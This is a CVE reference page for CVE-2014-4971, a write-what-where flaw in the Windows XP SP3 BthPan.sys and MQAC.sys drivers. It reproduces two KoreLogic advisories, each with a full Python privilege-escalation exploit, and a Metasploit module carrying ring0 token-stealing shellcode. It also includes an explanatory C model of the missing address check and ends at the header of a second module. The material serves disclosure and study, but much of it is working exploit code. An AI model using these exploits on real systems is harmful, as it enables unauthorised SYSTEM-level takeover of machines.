CVE-2014-4971 : Details

CVE-2014-4971

A03-Injection
26.3%V4
Local
2014-07-26 13:00 +00:00
2018-10-12 17:57 +00:00

CVE Description

Microsoft Windows XP SP3 does not validate addresses in certain IRP handler routines, which allows local users to write data to arbitrary memory locations, and consequently gain privileges, via a crafted address in an IOCTL call, related to (1) the MQAC.sys driver in the MQ Access Control subsystem and (2) the BthPan.sys driver in the Bluetooth Personal Area Networking subsystem.

CVE Information

Related Weaknesses

CWE-ID    Weakness Name                Source
CWE-20    Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metric    Score    Severity    CVSS Vector                    Source
V2        7.2                  AV:L/AC:L/Au:N/C:C/I:C/A:C     nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore serves to compare a CVE's EPSS score against other CVEs.

Exploit Information

Exploit Database EDB-ID : 34131

Publication date : 2014-07-20 22:00 +00:00
Author : KoreLogic
EDB Verified : No

"""
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-002
Publication Date: 2014-07-18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: Bluetooth Personal Area Networking
Affected Versions: 5.1.2600.5512
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000.

STACK_TEXT:
b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver.

FOLLOWUP_IP:
bthpan!BthpanReqAdd+16b
b272b5a1 ebc2            jmp     bthpan!BthpanReqAdd+0x12f (b272b565)

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)
ErrCode = 00000002
eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0         nv up ei pl nz na po cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010203
nt!IopCompleteRequest+0x92:
804f3b76 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft informs KoreLogic that the vulnerability does not impact any "up-platform" products. Says they are investigating embedded platforms. Does not provide CVE number.
2014.06.24 - Microsoft contacts KoreLogic to say that they confused the report of this vulnerability with another and that they cannot reproduce the described behavior. Microsoft asks for an updated Proof-of-Concept, crash dumps or any further analysis of the vulnerability that KoreLogic can provide.
2014.06.25 - KoreLogic provides Microsoft with an updated Proof-of-Concept which demonstrates using the vulnerability to spawn a system shell.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued for this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be identical to KL-001-2014-003 and issues CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.

7. Proof of Concept
"""

#!/usr/bin/python2
#
# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit

EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them

def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None

handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == INVALID_HANDLE_VALUE):
    print "[!] Could not open handle to BthPan"
    exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)

"""
The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""
Exploit Database EDB-ID : 34112

Publication date : 2014-07-18 22:00 +00:00
Author : KoreLogic
EDB Verified : No

Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-003
Publication Date: 2014.07.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: MQ Access Control
Affected Versions: 5.1.0.1110
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000.

STACK_TEXT:
b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d
b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d
b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31
b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70
b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver.

FOLLOWUP_IP:
mqac!AC2QM+5d
b230af37 891e            mov     dword ptr [esi],ebx

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)
ErrCode = 00000002
eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000
eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
mqac!AC2QM+0x5d:
b230af37 891e            mov     dword ptr [esi],ebx  ds:0023:ffff0000=????????

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft responds to KoreLogic that the vulnerability does not affect an "up-platform" product. Says they are investigating embedded platforms. Does not provide a CVE number or a disclosure date.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued to this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to be identical to KL-001-2014-002 and issues CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.

7. Proof of Concept

#!/usr/bin/python2
#
# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit

EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them :)

def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None

handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\x50\x00\x00\x00"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)

The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
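Both advisories above name the same root cause: the IRP handler writes InputBuffer data through the caller-supplied OutputBuffer address without validating it. The following C program is an added illustrative model (not part of the advisories, the PoCs, or any Windows driver) that puts the unchecked completion path beside one gated by a ProbeForWrite-style check, over a constructed 32-bit address map with one user page and a 16-byte stand-in for HalDispatchTable. ProbeForWrite, MmUserProbeAddress and the NTSTATUS codes are real Windows kernel names; the address map, table contents and input bytes are constructed for the model.

```c
/*
 * Model of the missing check behind CVE-2014-4971: an IOCTL completion path
 * copies InputBuffer to a caller-supplied OutputBuffer address without
 * validating it. User-space simulation over a constructed 32-bit address map,
 * not Windows driver code. In a real driver the equivalent check is
 * ProbeForWrite() inside __try/__except before any write through a user pointer.
 */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

/* 32-bit Windows: user-mode addresses lie below this boundary
   (the kernel exports it as MmUserProbeAddress). */
#define USER_PROBE_ADDRESS 0x7FFF0000u

/* Constructed address map: one user page plus a 16-byte kernel table standing
   in for HalDispatchTable; entry [1] is the +0x4 slot the advisories refer to. */
#define USER_BASE   0x00010000u
#define USER_SIZE   0x1000u
#define KTABLE_BASE 0x80550000u

static uint8_t  user_page[USER_SIZE];
static uint32_t kernel_table[4] = { 0x80600000u, 0x80600100u, 0x80600200u, 0x80600300u };

/* Constructed InputBuffer contents: 4 bytes, little-endian value 0x00011000. */
const uint8_t *sample_input(void)
{
    static const uint8_t in[4] = { 0x00, 0x10, 0x01, 0x00 };
    return in;
}

/* Map a model address range to host memory; NULL means unmapped, which in the
   real kernel is the page-fault bugcheck seen in the advisories' stack traces. */
static uint8_t *resolve(uint32_t addr, uint32_t len)
{
    if (len == 0) return NULL;
    if (addr >= USER_BASE && len <= USER_SIZE && addr - USER_BASE <= USER_SIZE - len)
        return user_page + (addr - USER_BASE);
    if (addr >= KTABLE_BASE && len <= sizeof kernel_table &&
        addr - KTABLE_BASE <= sizeof kernel_table - len)
        return (uint8_t *)kernel_table + (addr - KTABLE_BASE);
    return NULL;
}

/* Model of ProbeForWrite(): the range must be aligned, must not wrap around,
   and must lie entirely below the user/kernel boundary. The real routine raises
   an exception; here the status the handler would propagate is returned. */
uint32_t probe_for_write(uint32_t addr, uint32_t len, uint32_t align)
{
    if (len == 0) return STATUS_SUCCESS;
    if (addr % align != 0) return STATUS_DATATYPE_MISALIGNMENT;
    if (addr + len < addr) return STATUS_ACCESS_VIOLATION;        /* wraps */
    if (addr + len > USER_PROBE_ADDRESS) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Vulnerable completion path: copies wherever OutputBuffer points, kernel or not. */
uint32_t complete_ioctl_unchecked(const uint8_t *in, uint32_t len, uint32_t out_addr)
{
    uint8_t *dst = resolve(out_addr, len);
    if (dst == NULL) return STATUS_ACCESS_VIOLATION; /* unmapped: the fuzzing crash case */
    memcpy(dst, in, len);
    return STATUS_SUCCESS;
}

/* Hardened completion path: the same copy, but only after the address is probed. */
uint32_t complete_ioctl_checked(const uint8_t *in, uint32_t len, uint32_t out_addr)
{
    uint32_t st = probe_for_write(out_addr, len, 4);
    if (st != STATUS_SUCCESS) return st;
    return complete_ioctl_unchecked(in, len, out_addr);
}

/* Observers used to show what each path did to the model memory. */
uint32_t kernel_table_entry1(void) { return kernel_table[1]; }
uint32_t user_page_word0(void)
{
    return (uint32_t)user_page[0] | (uint32_t)user_page[1] << 8 |
           (uint32_t)user_page[2] << 16 | (uint32_t)user_page[3] << 24;
}

int main(void)
{
    uint32_t st = complete_ioctl_checked(sample_input(), 4, KTABLE_BASE + 4);
    printf("checked:   status 0x%08x, table[1] = 0x%08x\n", st, kernel_table_entry1());
    st = complete_ioctl_unchecked(sample_input(), 4, KTABLE_BASE + 4);
    printf("unchecked: status 0x%08x, table[1] = 0x%08x\n", st, kernel_table_entry1());
    return 0;
}
```

The checked path rejects the kernel-table address and leaves the table intact, while the unchecked path silently replaces the table entry with the caller's bytes; the same probe also rejects the unmapped 0xffff0000 address from the fuzz case before any access is attempted.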
Exploit Database EDB-ID : 34982

Publication date : 2014-10-14 22:00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
        'Jay Smith <jsmith[at]korelogic.com>'   # MSF module
      ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      'Targets'        => [
        ['Windows XP SP3',
          {
            'HaliQuerySystemInfo' => 0x16bba,
            '_KPROCESS' => "\x44",
            '_TOKEN'    => "\xc8",
            '_UPID'     => "\x84",
            '_APLINKS'  => "\x88"
          }
        ]
      ],
      'References'     => [
        [ 'CVE', '2014-4971' ],
        [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
        [ 'OSVDB', '109387' ]
      ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end

  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")

    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]

    print_status("Disclosing the HalDispatchTable address...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
    else
      print_good("Address successfully disclosed.")
    end

    print_status("Storing the shellcode in memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode
    kernel_shell_address = 0x1
    buf = "\x90" * 0x6000
    buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
    buf[0x5000, kernel_shell.length] = kernel_shell
    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    end
    print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end
Exploit Database EDB-ID : 34167

Publication date : 2014-07-24 22:00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
